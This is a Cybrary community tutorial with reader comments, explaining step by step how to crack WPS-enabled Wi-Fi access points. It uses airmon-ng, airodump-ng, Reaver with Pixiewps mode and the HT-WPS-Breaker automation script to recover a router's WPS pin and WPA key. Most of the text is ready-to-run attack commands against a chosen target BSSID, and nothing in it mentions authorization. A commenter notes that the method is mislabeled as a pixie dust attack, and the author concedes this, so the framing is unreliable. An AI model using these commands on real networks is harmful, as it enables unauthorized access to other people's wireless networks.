Hacking WPS via Pixie Dust Attack

April 22, 2016 | Views: 63024

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

This Cybrary 0P3N submission will cover how to use tools such as aircrack suite, Reaver, Pixiewps, & HT-WPS#B to exploit a WPS vulnerability in certain routers.

This attack is carried out on a Machine running Kali Linux. (Kali comes pre-packaged with the mentioned tools aside from HT-WPS#B).

Here is a list of vulnerable routers:
Spreadsheet of Routers Vulnerable to WPS Exploit

To start, open a terminal as root and run the following commands.


apt-get update

apt-get install reaver aircrack-ng


Once you have ran the following commands, we will use airmon-ng to set our wireless card into monitor mode. (Must have a wireless card capable of packet injection)

First we will check for any interfering processes by using the following command.


airmon-ng check


If processes were found, use the following command to kill them.


airmon-ng check kill


Now to set the card to monitor mode.


airmon-ng start wlan0


Next we will use airodump-ng to scan for wireless access points with WPS enabled.


airodump-ng wlan0mon --wps


Once airodump has found the AP you are attacking, press ctrl+C to stop, then copy down the BSSID & Channel #.

Our next step is to use Reaver combined with Pixiewps mode to exploit the target AP.


reaver -i wlan0mon -c # -b XX:XX:XX:XX:XX:XX -k 1


-i specifies the interface used

-c specifies the channel of the AP. Replace # with the channel number.

-b specifies the BSSID of the AP. Replace XX:XX:XX:XX:XX:XX with the BSSID you copied down.

You can also time the reaver process by using the following command.


time reaver -i wlan0mon -c # -b XX:XX:XX:XX:XX:XX -k 1


If successful, the WPS pin will be passed to reaver and the WPA key will be discovered.


Once you have followed the above steps and are comfortable with the process, I suggest using HT-WPS#B to automate the entire process.


Using HT-WPS-Breaker to automate the process.

To install, CLICK HERE then drag the .zip to your desktop and run the following commands.

  • cd Desktop
  • unzip HT-WPS-Breaker-master.zip
  • cd HT-WPS-Breaker-master
  • chmod +x HT-WB.sh
  • ./HT-WB.sh or bash HT-WB.sh


This concludes a simple write up of how to use Reaver and other tools to attack a WPS enabled AP.

I have had many questions on how to use Reaver so I hope this helps.

Comment below if you have any questions. (Please keep comments in regards to the topic).


Share with Friends
Use Cybytes and
Tip the Author!
Share with Friends
Ready to share your knowledge and expertise?
  1. This WPS type attack is great but it’s not a pixie dust attack. A Pixie dust attack is done with offline data. Reaver and the tool bully is great for online attacks but alot of routers today has bruteforce protection in the firmware. Some routers are vulnerable to a remote restart by overflowing the management frames. This can sometimes be done with MDK3. if you want to use a pixiedust attack you should have a look at Pixiewps.

    • Thanks you for clearing this up. (another reason as to why i should not write papers while in a hurry). If anyone is reading this, take not of the above post.


  2. HT-WPS-Breaker works but sometimes it shows WPS KEY Not Found Error

  3. Thats pretty cool. Thanks for posting.

  4. hey i m using reaver on my network but it tries one or two pins and then it shows send easpol request
    and time occured and it tries same pin even if i use -d option. i am not able to understand what’s the problem. can you help me. i have TP-LINK WN722N wireless adapter

Page 2 of 6«12345»...Last »
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge


We recommend always using caution when following any link

Are you sure you want to continue?